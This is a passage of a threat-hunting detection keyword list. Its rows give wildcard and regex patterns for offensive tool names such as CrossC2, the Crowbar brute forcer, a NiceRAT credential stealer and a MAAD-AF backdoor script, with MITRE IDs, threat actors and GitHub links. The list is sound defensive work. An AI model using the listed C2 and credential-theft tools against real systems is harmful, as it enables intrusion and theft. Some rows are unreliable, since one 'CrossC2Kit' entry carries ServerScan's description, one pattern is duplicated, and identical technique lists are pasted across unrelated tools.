"*crossc2_serverscan.*",".{0,1000}crossc2_serverscan\..{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","N/A","10","10","1595","221","2024-06-16T13:41:34Z","2020-04-03T15:14:12Z","39103" "*CrossC2Beacon*",".{0,1000}CrossC2Beacon.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - 
T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/gloxec/CrossC2","1","1","N/A","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","39104" "*CrossC2-cs*",".{0,1000}CrossC2\-cs.{0,1000}","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","39105" "*CrossC2-GithubBot*",".{0,1000}CrossC2\-GithubBot.{0,1000}","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - 
TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","39106" "*CrossC2Kit",".{0,1000}CrossC2Kit","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","39107" "*CrossC2Kit.*",".{0,1000}CrossC2Kit\..{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - 
menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","N/A","10","10","1595","221","2024-06-16T13:41:34Z","2020-04-03T15:14:12Z","39108" "*CrossC2Kit.*",".{0,1000}CrossC2Kit\..{0,1000}","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","N/A","10","10","218","37","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z","39109" "*CrossC2Kit.git*",".{0,1000}CrossC2Kit\.git.{0,1000}","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","N/A","10","10","218","37","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z","39110" "*CrossC2Kit_demo*",".{0,1000}CrossC2Kit_demo.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/gloxec/CrossC2","1","1","N/A","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","39111" "*crossc2kit_latest*",".{0,1000}crossc2kit_latest.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - 
T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/gloxec/CrossC2","1","1","N/A","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","39112" "*CrossC2Kit_Loader*",".{0,1000}CrossC2Kit_Loader.{0,1000}","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. 
thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","N/A","10","10","218","37","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z","39113" "*CrossC2Listener*",".{0,1000}CrossC2Listener.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 
- T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/gloxec/CrossC2","1","1","N/A","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","39114" "*CrossC2MemScriptEng*",".{0,1000}CrossC2MemScriptEng.{0,1000}","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. 
thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","N/A","10","10","218","37","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z","39115" "*CrossC2Script*",".{0,1000}CrossC2Script.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - 
T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/gloxec/CrossC2","1","1","N/A","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","39116" "*CrossLinked*",".{0,1000}CrossLinked.{0,1000}","offensive_tool_keyword","CrossLinked","CrossLinked simplifies the processes of searching LinkedIn to collect valid employee names when performing password spraying or other security testing against an organization. 
Using similar search engine scraping capabilities found in tools like subscraper and pymeta","T1596 - T1593 - T1591 - T1589 - T1556 - T1213","TA0043 - TA0010 - TA0009","N/A","N/A","Reconnaissance","https://github.com/m8r0wn/CrossLinked","1","0","N/A","N/A","N/A","10","1367","188","2024-11-26T12:52:16Z","2019-05-16T13:36:36Z","39117" "*CrossNet.exe*",".{0,1000}CrossNet\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike payload generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dr0op/CrossNet-Beta","1","1","N/A","N/A","10","10","362","58","2024-06-19T07:02:22Z","2021-02-08T10:52:39Z","39118" 
"*Cross-Site-Scripting-XSS-Payloads*",".{0,1000}Cross\-Site\-Scripting\-XSS\-Payloads.{0,1000}","offensive_tool_keyword","Offensive-Payloads","List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.","T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ","TA0001 - TA0002 - TA0006 - TA0008 - TA0011 - TA0009","N/A","N/A","Exploitation tool","https://github.com/InfoSecWarrior/Offensive-Payloads/","1","1","N/A","N/A","N/A","4","328","117","2024-09-20T09:59:28Z","2022-11-18T09:43:41Z","39119" "*CrossTenantSynchronizationBackdoor.ps1*",".{0,1000}CrossTenantSynchronizationBackdoor\.ps1.{0,1000}","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","8","4","396","56","2024-09-27T16:43:52Z","2023-02-09T02:08:07Z","39120" "*crowbar*",".{0,1000}crowbar.{0,1000}","offensive_tool_keyword","Crowbar","Crowbar (formally known as Levye) is a brute forcing tool that can be used during penetration tests. It was developed to brute force some protocols in a different manner according to other popular brute forcing tools. As an example. while most brute forcing tools use username and password for SSH brute force. Crowbar uses SSH key(s). This allows for any private keys that have been obtained during penetration tests. 
to be used to attack other SSH servers.","T1110 - T1114 - T1189 - T1051 - T1552","TA0002 - TA0006 - TA0008","N/A","Dispossessor","Credential Access","https://github.com/galkan/crowbar","1","0","N/A","N/A","N/A","10","1440","319","2023-12-19T20:57:36Z","2014-09-30T07:46:23Z","39121" "*CroweCybersecurity/ad-ldap-enum*",".{0,1000}CroweCybersecurity\/ad\-ldap\-enum.{0,1000}","offensive_tool_keyword","ad-ldap-enum","An LDAP based Active Directory user and group enumeration tool","T1087 - T1087.001 - T1018 - T1069 - T1069.002","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/CroweCybersecurity/ad-ldap-enum","1","1","N/A","AD Enumeration","6","4","308","66","2023-02-10T19:07:34Z","2015-08-25T19:38:39Z","39123" "*crpasswords.txt*",".{0,1000}crpasswords\.txt.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","39124" "*CRTInjectAsSystem*",".{0,1000}CRTInjectAsSystem.{0,1000}","offensive_tool_keyword","cobaltstrike","EDR Evasion - Combination of SwampThing - TikiTorch","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - 
